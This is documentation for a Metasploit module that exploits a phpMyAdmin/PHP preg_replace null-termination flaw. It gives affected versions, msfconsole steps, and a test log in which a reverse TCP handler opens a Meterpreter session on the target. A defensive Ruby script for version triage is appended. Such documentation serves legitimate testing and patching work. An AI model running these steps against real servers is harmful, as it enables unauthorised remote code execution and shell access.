## Description

This module exploits a vulnerability in PHP's `preg_replace()` function, which is used by phpMyAdmin's replace table feature.

## Vulnerable Application

PHP versions before 5.4.6 allow null termination of the `preg_replace` string parameter. phpMyAdmin versions 4.6.x (prior to 4.6.3), 4.4.x (prior to 4.4.15.7), and 4.0.x (prior to 4.0.10.16) are affected.

## Options

**DATABASE**

This option specifies the database the module will use when creating a new table as part of the exploit.

## Verification Steps

- [ ] Install vulnerable phpMyAdmin application
- [ ] Create database through phpMyAdmin application
- [ ] `./msfconsole`
- [ ] `use exploit/multi/http/phpmyadmin_null_termination_exec`
- [ ] `set USERNAME `
- [ ] `set PASSWORD `
- [ ] `set DATABASE `
- [ ] `set rhost `
- [ ] `run`

## Scenarios

### Tested on Windows 7 x64 running phpMyAdmin 4.3.0 on PHP 5.3.8

```
msf5 > use exploit/multi/http/phpmyadmin_null_termination_exec
msf5 exploit(multi/http/phpmyadmin_null_termination_exec) > set rhost 172.22.222.122
rhost => 172.22.222.122
msf5 exploit(multi/http/phpmyadmin_null_termination_exec) > set database
database =>
msf5 exploit(multi/http/phpmyadmin_null_termination_exec) > run

[*] Started reverse TCP handler on 172.22.222.177:4444
[*] Sending stage (37775 bytes) to 172.22.222.122
[*] Sleeping before handling stage...
[*] Meterpreter session 2 opened (172.22.222.177:4444 -> 172.22.222.122:49169) at 2018-06-18 07:28:19 -0500
[-] 172.22.222.122:80 - Failed to remove the table 'spkkw'

meterpreter > sysinfo
Computer    : WIN-V438RLMESAE
OS          : Windows NT 6.1 build 7601 (Windows 7 Business Edition Service Pack 1) i586
Meterpreter : php/windows
```
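
For defenders triaging an inventory against the ranges listed under Vulnerable Application, the following is an added example (not part of the module or of Metasploit). The function names and result labels are hypothetical, and it assumes a host is exposed only when both the phpMyAdmin and PHP conditions hold. Because the scenario above ran against phpMyAdmin 4.3.0, which is outside the listed branches, unlisted branches are reported for review instead of as safe.

```ruby
require 'rubygems' # Gem::Version gives correct multi-component comparison

# Thresholds taken from the "Vulnerable Application" section of this page.
PHP_FIXED = Gem::Version.new('5.4.6')
PMA_FIXED = { # phpMyAdmin branch => first fixed release on that branch
  '4.6' => Gem::Version.new('4.6.3'),
  '4.4' => Gem::Version.new('4.4.15.7'),
  '4.0' => Gem::Version.new('4.0.10.16')
}.freeze

# Keep only the leading dotted-numeric part, so a distro suffix such as
# "5.4.6-1ubuntu1" is not misread by Gem::Version as a pre-release of 5.4.6.
def parse_version(raw)
  core = raw.to_s[/\A\d+(?:\.\d+)*/] or
    raise ArgumentError, "unparseable version: #{raw.inspect}"
  Gem::Version.new(core)
end

# :affected, :fixed, or :unlisted_branch (branch not named on the page).
def pma_status(raw)
  v = parse_version(raw)
  fixed = PMA_FIXED[v.segments.first(2).join('.')]
  return :unlisted_branch unless fixed
  v < fixed ? :affected : :fixed
end

def php_null_termination?(raw)
  parse_version(raw) < PHP_FIXED
end

# Combined verdict for one host (hypothetical labels).
def triage(pma_raw, php_raw)
  pma = pma_status(pma_raw)
  old_php = php_null_termination?(php_raw)
  if pma == :affected && old_php then :exposed
  elsif pma == :unlisted_branch && old_php then :review
  elsif pma == :affected then :patch_phpmyadmin # PHP is new enough, app is not
  else :ok
  end
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample inventory: [host, phpMyAdmin version, PHP version]
  [['web01', '4.6.2', '5.3.8'], ['web02', '4.3.0', '5.3.8'],
   ['web03', '4.4.15.7', '5.4.6-1ubuntu1']].each do |host, pma, php|
    puts format('%-6s pma=%-9s php=%-15s %s', host, pma, php, triage(pma, php))
  end
end
```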